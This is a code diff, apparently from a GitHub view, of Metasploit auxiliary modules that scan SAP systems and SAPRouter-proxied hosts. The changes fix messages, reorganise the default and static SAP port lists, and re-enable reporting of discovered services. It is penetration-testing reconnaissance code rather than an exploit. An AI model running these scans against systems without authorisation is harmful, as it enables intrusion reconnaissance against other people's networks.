s.write(ni_packet, ni_packet.length) s.write(ni_packet, ni_packet.length)
response = s.get() response = s.get()
@ -320,7 +352,7 @@ class Metasploit3 < Msf::Auxiliary
end end
rescue ::Rex::ConnectionRefused rescue ::Rex::ConnectionRefused
print_error("#{ip}:#{port} - Unable to connect to SAPRouter #{sap_host}:#{sap_port} - Connection Refused") print_error("#{ip}:#{port} - Unable to connect to SAPRouter #{rhost}:#{rport} - Connection Refused")
rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error
rescue ::Rex::Post::Meterpreter::RequestError rescue ::Rex::Post::Meterpreter::RequestError
@ -354,10 +386,19 @@ class Metasploit3 < Msf::Auxiliary
r.each do |res| r.each do |res|
tbl << [res[0], res[1], res[2], res[3]] tbl << [res[0], res[1], res[2], res[3]]
# we can't report if resolution is remote, since host is unknown locally
if datastore['RESOLVE'] == 'local'
begin
report_service(:host => res[0], :port => res[1], :state => res[2]) report_service(:host => res[0], :port => res[1], :state => res[2])
rescue ActiveRecord::RecordInvalid
# Probably raised because the Address is reserved, for example
# when trying to report a service on 127.0.0.1
print_warning("Can't report #{res[0]} as host to the database")
end
end
end end
print_warning("Warning: Service info could be innacurated") print_warning("Warning: Service info could be inaccurate")
print(tbl.to_s) print(tbl.to_s)
end end

View File

@ -47,15 +47,20 @@ class Metasploit4 < Msf::Auxiliary
def_ports = [ def_ports = [
'32NN', '33NN', '48NN', '80NN', '36NN', '81NN', '5NN00', '5NN01', '5NN02', '32NN', '33NN', '48NN', '80NN', '36NN', '81NN', '5NN00', '5NN01', '5NN02',
'5NN03', '5NN04', '5NN05', '5NN06', '5NN07', '5NN08', '5NN10', '5NN16', '5NN03', '5NN04', '5NN05', '5NN06', '5NN07', '5NN08', '5NN10', '5NN16',
'5NN13', '5NN14', '5NN17', '5NN18', '5NN19', '21212', '21213', '59975', '5NN13', '5NN14', '5NN17', '5NN18', '5NN19', '5NN15', '39NN', '4NN00',
'59976', '4238', '4239','4240', '4241', '3299', '3298', '515', '7200', '3NN01', '3NN02', '3NN03', '3NN04', '3NN05', '3NN06', '3NN07', '3NN08',
'7210', '7269', '7270', '7575', '5NN15', '39NN', '3909', '4NN00', '8200', '3NN11', '3NN17'
'8210', '8220', '8230', '4363', '4444', '4445', '9999', '3NN01', '3NN02',
'3NN03', '3NN04', '3NN05', '3NN06', '3NN07', '3NN08', '3NN11', '3NN17',
'20003', '20004', '20005', '20006', '20007', '31596', '31597', '31602',
'31601', '31604', '2000', '2001', '2002', '8355', '8357', '8351' ,'8352',
'8353', '8366', '1090', '1095', '20201', '1099', '1089'
] ]
static_ports = [
'21212', '21213', '59975', '59976', '4238', '4239','4240', '4241', '3299',
'3298', '515', '7200', '7210', '7269', '7270', '7575', '3909', '8200',
'8210', '8220', '8230', '4363', '4444', '4445', '9999', '20003', '20004',
'20005', '20006', '20007', '31596', '31597', '31602', '31601', '31604',
'2000', '2001', '2002', '8355', '8357', '8351' ,'8352', '8353', '8366',
'1090', '1095', '20201', '1099', '1089'
]
ports = [] ports = []
# Build ports array from valid instance numbers # Build ports array from valid instance numbers
@ -94,7 +99,7 @@ class Metasploit4 < Msf::Auxiliary
final_ports << dport.gsub("NN", inst) final_ports << dport.gsub("NN", inst)
end end
end end
final_ports.push(*static_ports)
ports = final_ports ports = final_ports
if ports.empty? if ports.empty?
@ -222,14 +227,15 @@ class Metasploit4 < Msf::Auxiliary
end end
print_good("#{ip}:#{port}\t - #{service} OPEN") print_good("#{ip}:#{port}\t - #{service} OPEN")
=begin begin
report_note(:host => "#{ip}", report_note(
:host => "#{ip}",
:proto => 'TCP', :proto => 'TCP',
:port => "#{port}", :port => "#{port}",
:type => 'SAP', :type => 'SAP',
:data => "#{service}") :data => "#{service}"
=end )
end
r << [ip,port,"open", service] r << [ip,port,"open", service]
rescue ::Rex::ConnectionRefused rescue ::Rex::ConnectionRefused
vprint_status("#{ip}:#{port}\t - TCP closed") vprint_status("#{ip}:#{port}\t - TCP closed")

View File

@ -74,7 +74,7 @@ class Metasploit3 < Msf::Auxiliary
# this is needed on windows cause we send interface directly to Pcap functions # this is needed on windows cause we send interface directly to Pcap functions
@interface = get_interface_guid(@interface) @interface = get_interface_guid(@interface)
@iface_ip = datastore['LOCALIP'] @iface_ip = datastore['LOCALIP']
@iface_ip ||= Pcap.lookupaddrs(@interface)[0] if netifaces @iface_ip ||= get_ipv4_addr(@interface) if netifaces
raise "Interface IP is not defined and can not be guessed" unless @iface_ip raise "Interface IP is not defined and can not be guessed" unless @iface_ip
# start with blank slate # start with blank slate

Some files were not shown because too many files have changed in this diff Show More